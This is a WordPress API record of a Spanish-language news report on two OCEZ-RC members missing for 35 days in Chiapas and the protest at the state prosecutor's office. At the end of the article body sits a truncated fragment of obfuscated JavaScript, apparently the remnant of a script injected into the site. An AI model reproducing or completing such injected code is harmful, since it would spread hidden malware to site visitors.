{"id":11105,"date":"2023-08-01T04:23:29","date_gmt":"2023-08-01T04:23:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11105"},"modified":"2023-08-01T04:23:29","modified_gmt":"2023-08-01T04:23:29","slug":"se-cumplen-35-dias-de-la-desaparicion-de-dos-integrantes-de-la-ocez-rc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11105","title":{"rendered":"Se cumplen 35 d\u00edas de la desaparici\u00f3n de dos integrantes de la OCEZ-RC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1690863787369-1024x768.jpg\" alt=\"\" class=\"wp-image-11106\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1690863787369-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1690863787369-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1690863787369-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1690863787369.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>31 de julio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este lunes se cumplieron 35 d\u00edas de la desaparici\u00f3n de Uberla\u00edn Aguilar de La Cruz y Marco Antonio D\u00edaz G\u00f3mez, integrantes de la Organizaci\u00f3n Campesina Emiliano Zapata-Regi\u00f3n Carranza (OCEZ-RC) motivo por el que, sus compa\u00f1eros tomaron las oficinas de la Fiscal\u00eda General del Estado en la capital chiapaneca.<\/p>\n\n\n\n<p>De acuerdo a la versi\u00f3n de las familiares, fue a las 8 de la ma\u00f1ana del 26 de junio la \u00faltima vez que los vieron cuando viajaban hacia Pujiltic.<\/p>\n\n\n\n<p>Maricela del Carmen Aguilar de La Cruz, hermana de Uberla\u00edn, dio a conocer que, desde el momento de la desaparici\u00f3n han exigido al gobierno del estado y la Fiscal\u00eda de B\u00fasqueda de Desaparici\u00f3n Forzada que se den resultados contundentes.<\/p>\n\n\n\n<p>Precis\u00f3 que: \u201cDesde entonces llevamos 35 d\u00edas de bloqueo entre el tramo carretero El Cascajal; sin tener una respuesta de b\u00fasqueda, mucho menos que nos den una pista de c\u00f3mo se encuentran nuestros compa\u00f1eros; por lo cual la Asamblea General de nuestra Organizaci\u00f3n OCEZ-R.C., acordamos manifestarnos en la Fiscal\u00eda General del Estado por negligencia y omisi\u00f3n ante las recomendaciones de la ONU de llevar a cabo las acciones urgentes para la b\u00fasqueda de los compa\u00f1eros desaparecidos\u201d.<\/p>\n\n\n\n<p>Expuso que, la organizaci\u00f3n acord\u00f3 este mismo lunes levantar el bloqueo para, dejar claro que seguir\u00e1n exigiendo con acciones escalonadas hasta que sus compa\u00f1eros aparezcan.<\/p>\n\n\n\n<p>Los familiares de Uberla\u00edn, insistieron en el llamado a las autoridades para que los dos integrantes de la organizaci\u00f3n aparezcan con vida.<\/p>\n\n\n\n<p>Se\u00f1alaron que, como protocolo, se solicit\u00f3 el apoyo de las c\u00e1maras de seguridad ubicada en este punto, sin embargo, la respuesta fue que no sirven, por lo que se podr\u00eda estar incurriendo en irregularidades en la investigaci\u00f3n.<\/p>\n\n\n\n<p>Por \u00faltimo, los integrantes de la OCEZ expresaron, \u201cdejamos claro que somos una Organizaci\u00f3n Campesina que luchamos por nuestras demandas agrarias, sociales, productivas de justicia y por la defensa de los derechos humanos. As\u00ed mismo pedimos disculpas al pueblo en general por las molestias causadas\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 31 de julio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este lunes se cumplieron 35 d\u00edas de la desaparici\u00f3n de Uberla\u00edn Aguilar de La Cruz y Marco Antonio D\u00edaz G\u00f3mez, integrantes de la Organizaci\u00f3n Campesina Emiliano Zapata-Regi\u00f3n Carranza (OCEZ-RC) motivo por el que, sus compa\u00f1eros tomaron las oficinas de la Fiscal\u00eda General del Estado en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11106,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-11105","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11105","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11105"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11105\/revisions"}],"predecessor-version":[{"id":11107,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11105\/revisions\/11107"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11106"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11105"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11105"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11105"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}